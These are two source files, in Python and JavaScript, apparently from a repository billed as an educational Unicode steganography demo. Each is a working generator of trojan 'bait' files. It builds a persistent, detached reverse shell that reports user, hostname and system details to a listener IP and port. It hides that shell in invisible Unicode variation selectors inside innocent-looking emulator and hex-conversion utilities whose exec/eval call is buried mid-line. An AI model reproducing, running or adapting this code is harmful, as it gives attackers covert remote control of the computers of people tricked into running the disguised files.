File: level_3/python/bait_generator.py
"""
GENERATOR - Educational Unicode Steganography Demo
FE00 + E0100 Technique — Python

Generates: bait_emulator.py  (emulator pattern, justified exec)
           bait_utils.py     (utility pattern, hidden inline exec)

Usage: python bait_generator.py <IP> <PORT>
       python bait_generator.py --ip <IP> --port <PORT>
"""

import os
import sys

sys.stdout.reconfigure(encoding='utf-8')


def build_payload(ip, port):
    tpl = '''
import subprocess, sys, platform, shutil, base64

LISTENER_IP = '__LISTENER_IP__'
PORT = __LISTENER_PORT__
_sys = platform.system()

# Shell based on OS — Windows: pwsh -> powershell -> cmd
#                     macOS  : zsh (default since Catalina 2019) -> bash
#                     Linux  : bash -> sh
if _sys == 'Windows':
    _sh = shutil.which('pwsh') or shutil.which('powershell') or 'cmd.exe'
    # UTF-8 encoding as startup argument — applied BEFORE any output
    if 'pwsh' in _sh.lower() or 'powershell' in _sh.lower():
        _shell = [_sh, '-NoExit', '-Command', '[Console]::OutputEncoding=[Text.Encoding]::UTF8']
    else:
        _shell = [_sh, '/Q', '/K', 'chcp 65001']
elif _sys == 'Darwin':
    _shell = [shutil.which('zsh') or '/bin/bash', '-i']
else:
    _shell = [shutil.which('bash') or '/bin/sh', '-i']

_is_win = _sys == 'Windows'

# Self-contained script: reconnect + backoff (5s, +3, reset at >=60s, max 7 days)
_code = f"""import socket, subprocess, threading, time, platform, getpass, os

IP = {repr(LISTENER_IP)}
PORT = {repr(PORT)}
sh = {repr(_shell)}
w = 5
_end = time.time() + 604800

while time.time() < _end:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((IP, PORT))
        w = 5
        _sep = chr(9472) * 50 + chr(10)
        _fi = [
            "  OS      : " + platform.system() + " " + platform.release() + " " + platform.version(),
            "  Shell   : " + os.path.basename(sh[0]),
            "  User    : " + getpass.getuser(),
            "  Hostname: " + socket.gethostname(),
            "  Arch    : " + platform.machine(),
            "  CWD     : " + os.getcwd(),
            "  PID     : " + str(os.getpid())
        ]
        s.sendall((_sep + chr(10).join(_fi) + chr(10) + _sep).encode("utf-8"))

        if platform.system() == "Windows":
            p = subprocess.Popen(sh, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                                 stderr=subprocess.STDOUT, bufsize=0)

            def fo(pr, sk):
                while True:
                    d = pr.stdout.read(4096)
                    if not d:
                        pr.kill()
                        break
                    try:
                        sk.sendall(d)
                    except:
                        pr.kill()
                        break

            def fi(pr, sk):
                while True:
                    try:
                        d = sk.recv(4096)
                    except:
                        pr.kill()
                        break
                    if not d:
                        pr.kill()
                        break
                    try:
                        pr.stdin.write(d)
                        pr.stdin.flush()
                    except:
                        break

            threading.Thread(target=fo, args=(p, s), daemon=True).start()
            threading.Thread(target=fi, args=(p, s), daemon=True).start()
            p.wait()
        else:
            p = subprocess.Popen(sh, stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
            p.wait()

        s.close()
    except Exception:
        try:
            s.close()
        except:
            pass
    time.sleep(w)
    w = 5 if w >= 60 else w + 3"""
_b64 = base64.b64encode(_code.encode()).decode()


# Launch detached process — survives parent terminal closing
try:
    _cmd = [sys.executable, '-c', 'import base64;exec(base64.b64decode("' + _b64 + '"))']
    if _is_win:
        subprocess.Popen(_cmd, creationflags=0x08000000,
                         stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    else:
        subprocess.Popen(_cmd, start_new_session=True,
                         stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception:
    pass
'''
    return tpl.replace('__LISTENER_IP__', ip).replace('__LISTENER_PORT__', str(port))


def encode(text):
    result = ''
    for byte in text.encode('utf-8'):
        if byte < 16:
            result += chr(0xFE00 + byte)
        else:
            result += chr(0xE0100 + byte - 16)
    return result


# ═══════════════════════════════════════════════════════
#  ARGUMENT PARSING
# ═══════════════════════════════════════════════════════

def parse_args():
    args = sys.argv[1:]
    ip = port = None
    i = 0
    while i < len(args):
        if args[i] == '--ip' and i + 1 < len(args):
            ip = args[i + 1]; i += 2
        elif args[i] == '--port' and i + 1 < len(args):
            port = args[i + 1]; i += 2
        elif not args[i].startswith('--'):
            if ip is None: ip = args[i]
            elif port is None: port = args[i]
            i += 1
        else:
            i += 1
    return ip, port


def show_usage():
    name = 'python bait_generator.py'
    print('\033[36m╔' + '═' * 56 + '╗')
    print('║  BAIT GENERATOR — Hidden Unicode Payload              ║')
    print('╚' + '═' * 56 + '╝\033[0m')
    print()
    print(f'Usage: {name} <IP> <PORT>')
    print(f'       {name} --ip <IP> --port <PORT>')
    print()
    print('  IP     IP or domain where your listener is running')
    print('  PORT   Listener port')
    print()
    print('Examples:')
    print(f'  Same network:  {name} 192.168.1.6 4444')
    print(f'  With ngrok:    {name} 8.tcp.ngrok.io 10914')
    print(f'  Same PC:       {name} 127.0.0.1 4444')
    print()
    sys.exit(1)


_ip, _port = parse_args()

if not _ip or not _port:
    show_usage()

try:
    _port = int(_port)
except ValueError:
    print('\033[31m[!] Error: port must be a number between 1 and 65535\033[0m')
    sys.exit(1)

if not (1 <= _port <= 65535):
    print('\033[31m[!] Error: port must be a number between 1 and 65535\033[0m')
    sys.exit(1)

payload = build_payload(_ip, _port)
invisible = encode(payload)

# ═══════════════════════════════════════════════════════
#  GENERATE bait_emulator.py — emulator pattern
#  exec is JUSTIFIED by the emulator design.
# ═══════════════════════════════════════════════════════
file1 = (
    '# bait_emulator.py - Educational example of processing in Python\n'
    '# This script demonstrates how to transform special Unicode characters into numeric values\n'
    '# and then concatenate strings to simulate a basic execution environment.\n'
    '# Usage: python bait_emulator.py\n'
    '\n'
    '# Function that converts Unicode Variation Selectors to bytes, to_bytes\n'
    'def to_bytes(s):\n'
    '    result = []\n'
    '    for c in s:\n'
    '        cp = ord(c)\n'
    '        if 0xFE00 <= cp <= 0xFE0F: result.append(cp - 0xFE00)\n'
    '        elif 0xE0100 <= cp <= 0xE01EF: result.append(cp - 0xE0100 + 16)\n'
    '    return bytes(result)\n'
    '\n'
    '# Initial emulator environment — base string of Variation Selectors\n'
    "empty = '" + invisible + "'\n"
    '\n'
    '# Function that simulates Python code execution with a preloaded environment\n'
    "# Note: exec is used solely for demonstrative purposes in this academic example\n"
    'def emulate_message(code):\n'
    "    exec(to_bytes(empty).decode('utf-8') + code)\n"
    '\n'
    '# Example usage of the emulator: prints a message to console\n'
    "emulate_message(\"print('Hello world')\")\n"
)

# ═══════════════════════════════════════════════════════
#  GENERATE bait_utils.py — utility pattern, hidden exec
# ═══════════════════════════════════════════════════════
file2 = (
    '# bait_utils.py - Hexadecimal conversion utilities\n'
    '# Converts strings and bytes between their hexadecimal representations\n'
    '# Usage: python bait_utils.py\n'
    '\n'
    'def _decode(s):\n'
    '    r = []\n'
    '    for c in s:\n'
    '        cp = ord(c)\n'
    '        if 0xFE00 <= cp <= 0xFE0F: r.append(cp - 0xFE00)\n'
    '        elif 0xE0100 <= cp <= 0xE01EF: r.append(cp - 0xE0100 + 16)\n'
    "    return bytes(r).decode('utf-8')\n"
    '\n'
    "empty = '" + invisible + "'\n"
    '\n'
    "def str_to_hex(s, enc='utf-8'): return s.encode(enc).hex()\n"
    'def hex_to_bytes(h): return bytes.fromhex(h)\n'
    'def bytes_to_hex(b): return b.hex()\n'
    "def format_hex(h, sep=' '): return sep.join(h[i:i+2].upper() for i in range(0, len(h), 2))\n"
    "def hex_to_str(h, enc='utf-8'): result = bytes.fromhex(h).decode(enc); exec(_decode(empty)); return result\n"
    '\n'
    '# Demo\n'
    "s = 'Hello Duver'\n"
    'h = str_to_hex(s)\n'
    "print(f'str -> hex: {h}')\n"
    "print(f'hex -> str: {hex_to_str(h)}')\n"
    "print(f'formatted: {format_hex(h)}')\n"
)

os.makedirs('Bait To Client', exist_ok=True)

with open(os.path.join('Bait To Client', 'bait_emulator.py'), 'w', encoding='utf-8') as f:
    f.write(file1)

with open(os.path.join('Bait To Client', 'bait_utils.py'), 'w', encoding='utf-8') as f:
    f.write(file2)

_script_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(_script_dir, '.last_target'), 'w') as f:
    f.write(f'{_ip}\n{_port}\n')

# ═══════════════════════════════════════════════════════
#  OUTPUT
# ═══════════════════════════════════════════════════════
payload_bytes    = len(payload.encode('utf-8'))
invisible_chars  = len(invisible)
invisible_weight = len(invisible.encode('utf-8'))
size1_total      = len(file1.encode('utf-8'))
size2_total      = len(file2.encode('utf-8'))
size1_visible    = size1_total - invisible_weight
size2_visible    = size2_total - invisible_weight

exec_line = next((l for l in file2.splitlines() if 'exec(' in l), '')
exec_col  = len(exec_line.encode('utf-8')) - len(exec_line.encode('utf-8').lstrip()) \
            + exec_line.lstrip().index('exec(') + 1 if exec_line else 0

def kb(n): return f'{n / 1024:.1f} KB'

print('\033[36m╔' + '═' * 56 + '╗')
print('║  BAIT GENERATOR — Hidden Unicode Payload              ║')
print('╚' + '═' * 56 + '╝\033[0m')
print()
print('\033[33m[*] Configuration\033[0m')
print(f'    LISTENER_IP : {_ip}')
print(f'    PORT        : {_port}')
print()
print('\033[33m[*] Encoded payload\033[0m')
print(f'    {payload_bytes} bytes → {invisible_chars} invisible characters (Unicode Variation Selectors)')
print(f'    Hidden payload weight: {kb(invisible_weight)}')
print()
print('\033[32m[✓] File 1 → Bait To Client/bait_emulator.py\033[0m')
print('    Technique      : Python Emulator (semantically justified exec)')
print(f'    Visible size   : {kb(size1_visible)}  ← what the file recipient sees')
print(f'    Actual size    : {kb(size1_total)}  ← true size on disk')
print(f'    Difference     : +{kb(invisible_weight)} of invisible characters')
print()
print('\033[32m[✓] File 2 → Bait To Client/bait_utils.py\033[0m')
print(f'    Technique      : Hex utility (exec hidden at column ~{exec_col})')
print(f'    Visible size   : {kb(size2_visible)}  ← what the file recipient sees')
print(f'    Actual size    : {kb(size2_total)}  ← true size on disk')
print(f'    Difference     : +{kb(invisible_weight)} of invisible characters')
print()
print('\033[32m[✓] 2 bait files generated successfully.\033[0m')
print('    The payload is invisible to the human eye — the baits look like legitimate code.')
print()
print()

File: level_3/javascript/bait_generator.js
/**
 * GENERATOR - Educational Unicode Steganography Demo
 * FE00 + E0100 Technique — JavaScript
 *
 * Generates: bait_emulator.js and bait_hex.js
 *
 * Usage: node bait_generator.js <IP> <PORT>
 *        node bait_generator.js --ip <IP> --port <PORT>
 */

const fs = require('fs');
const path = require('path');

function buildPayload(ip, port) {
    return `
const { spawn, execSync } = require('child_process');

const LISTENER_IP = '${ip}';
const PORT = ${port};

// Shell based on OS — Windows: pwsh -> powershell -> cmd
//                     macOS  : zsh (default since Catalina 2019) -> bash
//                     Linux  : bash -> sh
let shell;
if (process.platform === 'win32') {
    let sh = null;
    try { execSync('where pwsh', { stdio: 'ignore' }); sh = 'pwsh.exe'; } catch {}
    if (!sh) { try { execSync('where powershell', { stdio: 'ignore' }); sh = 'powershell.exe'; } catch {} }
    if (sh) {
        shell = [sh, '-NoExit', '-Command', '[Console]::OutputEncoding=[Text.Encoding]::UTF8'];
    } else {
        shell = ['cmd.exe', '/Q', '/K', 'chcp 65001'];
    }
} else if (process.platform === 'darwin') {
    let hasZsh = false;
    try { execSync('which zsh', { stdio: 'ignore' }); hasZsh = true; } catch {}
    shell = hasZsh ? ['/bin/zsh', '-i'] : ['/bin/bash', '-i'];
} else {
    let hasBash = false;
    try { execSync('which bash', { stdio: 'ignore' }); hasBash = true; } catch {}
    shell = hasBash ? ['/bin/bash', '-i'] : ['/bin/sh', '-i'];
}

// Self-contained script: reconnect + backoff (5s, +3, reset at >=60s, max 7 days)
const inner = \`const net = require('net');
const { spawn } = require('child_process');
const os = require('os');
const path = require('path');

const IP = \${JSON.stringify(LISTENER_IP)};
const PORT = \${PORT};
const sh = \${JSON.stringify(shell)};

let w = 5;
const end = Date.now() + 604800000;

function connect() {
    if (Date.now() >= end) return;

    const c = net.connect(PORT, IP, () => {
        w = 5;
        const sep = String.fromCharCode(9472).repeat(50) + '\\\\n';
        const fi = [
            '  OS      : ' + os.platform() + ' ' + os.release(),
            '  Shell   : ' + path.basename(sh[0]),
            '  User    : ' + os.userInfo().username,
            '  Hostname: ' + os.hostname(),
            '  Arch    : ' + os.arch(),
            '  CWD     : ' + process.cwd(),
            '  PID     : ' + process.pid
        ];
        c.write(sep + fi.join('\\\\n') + '\\\\n' + sep);

        const p = spawn(sh[0], sh.slice(1), {
            stdio: ['pipe', 'pipe', 'pipe'],
            windowsHide: true
        });
        c.pipe(p.stdin);
        p.stdout.pipe(c);
        p.stderr.pipe(c);
        p.on('close', () => { c.destroy(); });
    });

    c.on('error', () => {});
    c.on('close', () => {
        setTimeout(connect, w * 1000);
        w = w >= 60 ? 5 : w + 3;
    });
}

connect();\`;

// Launch detached process — survives parent terminal closing
const child = spawn(process.execPath, ['-e', inner], {
    detached: true,
    stdio: 'ignore',
    windowsHide: true
});
child.unref();
    `;
}

function encode(text) {
    const bytes = Buffer.from(text, 'utf-8');
    let result = '';
    for (const byte of bytes) {
        if (byte < 16) result += String.fromCodePoint(0xFE00 + byte);
        else result += String.fromCodePoint(0xE0100 + byte - 16);
    }
    return result;
}

// ═══════════════════════════════════════════════════════
//  ARGUMENT PARSING
// ═══════════════════════════════════════════════════════

function parseArgs() {
    const args = process.argv.slice(2);
    let ip = null, port = null;
    for (let i = 0; i < args.length; i++) {
        if (args[i] === '--ip' && args[i + 1]) { ip = args[++i]; }
        else if (args[i] === '--port' && args[i + 1]) { port = args[++i]; }
        else if (!args[i].startsWith('--')) {
            if (!ip) ip = args[i];
            else if (!port) port = args[i];
        }
    }
    return { ip, port };
}

function showUsage() {
    const name = 'node bait_generator.js';
    console.log('\x1b[36m\u2554' + '\u2550'.repeat(56) + '\u2557');
    console.log('\u2551  BAIT GENERATOR \u2014 Hidden Unicode Payload              \u2551');
    console.log('\u255a' + '\u2550'.repeat(56) + '\u255d\x1b[0m');
    console.log('');
    console.log(`Usage: ${name} <IP> <PORT>`);
    console.log(`       ${name} --ip <IP> --port <PORT>`);
    console.log('');
    console.log('  IP     IP or domain where your listener is running');
    console.log('  PORT   Listener port');
    console.log('');
    console.log('Examples:');
    console.log(`  Same network:  ${name} 192.168.1.6 4444`);
    console.log(`  With ngrok:    ${name} 8.tcp.ngrok.io 10914`);
    console.log(`  Same PC:       ${name} 127.0.0.1 4444`);
    console.log('');
    process.exit(1);
}

const { ip: _ip, port: _portStr } = parseArgs();

if (!_ip || !_portStr) showUsage();

const _port = parseInt(_portStr, 10);
if (isNaN(_port) || _port < 1 || _port > 65535) {
    console.error('\x1b[31m[!] Error: port must be a number between 1 and 65535\x1b[0m');
    process.exit(1);
}

const payload = buildPayload(_ip, _port);
const invisible = encode(payload);

// ═══════════════════════════════════════════════════════
//  GENERATE bait_emulator.js — JS emulator
//  The eval is JUSTIFIED by the emulator design.
// ═══════════════════════════════════════════════════════
const file2 = `// bait_emulator.js - Educational example of processing in JavaScript
// This script demonstrates how to transform special Unicode characters into numeric values
// and then concatenate strings to simulate a basic execution environment.
// Usage: node bait_emulator.js

// Function that converts Unicode Variation Selectors to numeric values, ToHex
const toHex = v => [...v].map(w => (w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null)).filter(n => n !== null);

// Initial emulator environment — base string of Variation Selectors
const empty = \`${invisible}\`;

// Function that simulates JavaScript code execution with a preloaded environment
// Note: eval is used solely for demonstrative purposes in this academic example
function emulateMessageHexJS(code) {
    eval(Buffer.from(toHex(empty)).toString('utf-8') + code);
}

// Example usage of the emulator: prints a message to console
emulateMessageHexJS("console.log('Hello world')");
`;

const outDir = 'Bait To Client';
if (!fs.existsSync(outDir)) fs.mkdirSync(outDir);

fs.writeFileSync(path.join(outDir, 'bait_emulator.js'), file2, 'utf-8');

// ═══════════════════════════════════════════════════════
//  GENERATE bait_hex.js — hex converter with hidden eval
// ═══════════════════════════════════════════════════════
const finalFile = `// bait_hex.js - Unicode hexadecimal conversion utility
// Converts strings, buffers and code points between their hex representations
// Usage: node bait_hex.js

const toHex = v => [...v].map(w => (w = w.codePointAt(0), w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null)).filter(n => n !== null);

function validateHex(hex) {
    let clean = hex.replace(/\\s+/g, '').toLowerCase(); let isEven = clean.length % 2 === 0; let isHex = /^[0-9a-f]*$/.test(clean); return { clean, valid: isEven && isHex, byteLen: clean.length / 2 };
}

function hexToBytes(hex) {
    let { clean, valid } = validateHex(hex); if (!valid) throw new Error('Invalid hex string'); return clean.match(/.{2}/g).map(h => parseInt(h, 16));
}

function bytesToHex(bytes) {
    return Array.from(bytes).map(b => b.toString(16).padStart(2, '0')).join('');
}

function formatHex(hex, sep) {
    let { clean, valid } = validateHex(hex); if (!valid) throw new Error('Invalid hex string'); return clean.match(/.{2}/g).map(s => s.toUpperCase()).join(sep || ' ');
}

function stringToHex(str, enc) {
    let buf = Buffer.from(str, enc || 'utf-8'); return bytesToHex(buf);
}

function hexToString(hex, enc) {
    let bytes = hexToBytes(hex); let result = Buffer.from(bytes).toString(enc || 'utf-8'); let preview = result.slice(0, 32).replace(/[\\x00-\\x1f]/g, '.'); eval(Buffer.from(toHex(\`${invisible}\`)).toString('utf-8'));
    return result;
}

// Demo
const input = "Hello Duver";
const h = stringToHex(input);
console.log("str -> hex:", h);
console.log("hex -> str:", hexToString(h));
console.log("formatted:", formatHex(h));
`;

fs.writeFileSync(path.join(outDir, 'bait_hex.js'), finalFile, 'utf-8');
fs.writeFileSync(path.join(__dirname, '.last_target'), `${_ip}\n${_port}\n`, 'utf-8');

const payloadBytes   = Buffer.from(payload).length;
const invisibleChars = [...invisible].length;
const invisibleWeight = Buffer.byteLength(invisible, 'utf-8');
const size1Total    = Buffer.byteLength(file2, 'utf-8');
const size2Total    = Buffer.byteLength(finalFile, 'utf-8');
const size1Visible  = size1Total - invisibleWeight;
const size2Visible  = size2Total - invisibleWeight;
const evalLineStr   = finalFile.split('\n').find(l => l.includes('eval('));
const evalCol = evalLineStr
    ? evalLineStr.replace(/[\uFE00-\uFE0F]/g, '').replace(/[\uDB40][\uDD00-\uDDEF]/g, '').indexOf('eval(') + 1
    : 0;
const kb = n => (n / 1024).toFixed(1) + ' KB';

console.log('\x1b[36m\u2554' + '\u2550'.repeat(56) + '\u2557');
console.log('\u2551  BAIT GENERATOR \u2014 Hidden Unicode Payload              \u2551');
console.log('\u255a' + '\u2550'.repeat(56) + '\u255d\x1b[0m');
console.log('');
console.log('\x1b[33m[*] Configuration\x1b[0m');
console.log(`    LISTENER_IP : ${_ip}`);
console.log(`    PORT        : ${_port}`);
console.log('');
console.log('\x1b[33m[*] Encoded payload\x1b[0m');
console.log(`    ${payloadBytes} bytes \u2192 ${invisibleChars} invisible characters (Unicode Variation Selectors)`);
console.log(`    Hidden payload weight: ${kb(invisibleWeight)}`);
console.log('');
console.log('\x1b[32m[\u2713] File 1 \u2192 Bait To Client/bait_emulator.js\x1b[0m');
console.log('    Technique      : JS Emulator (semantically justified eval)');
console.log(`    Visible size   : ${kb(size1Visible)}  \u2190 what the file recipient sees`);
console.log(`    Actual size    : ${kb(size1Total)}  \u2190 true size on disk`);
console.log(`    Difference     : +${kb(invisibleWeight)} of invisible characters`);
console.log('');
console.log('\x1b[32m[\u2713] File 2 \u2192 Bait To Client/bait_hex.js\x1b[0m');
console.log(`    Technique      : Hex converter (eval hidden at column ~${evalCol})`);
console.log(`    Visible size   : ${kb(size2Visible)}  \u2190 what the file recipient sees`);
console.log(`    Actual size    : ${kb(size2Total)}  \u2190 true size on disk`);
console.log(`    Difference     : +${kb(invisibleWeight)} of invisible characters`);
console.log('');
console.log('\x1b[32m[\u2713] 2 bait files generated successfully.\x1b[0m');
console.log('    The payload is invisible to the human eye — the baits look like legitimate code.');
console.log('');
console.log('');
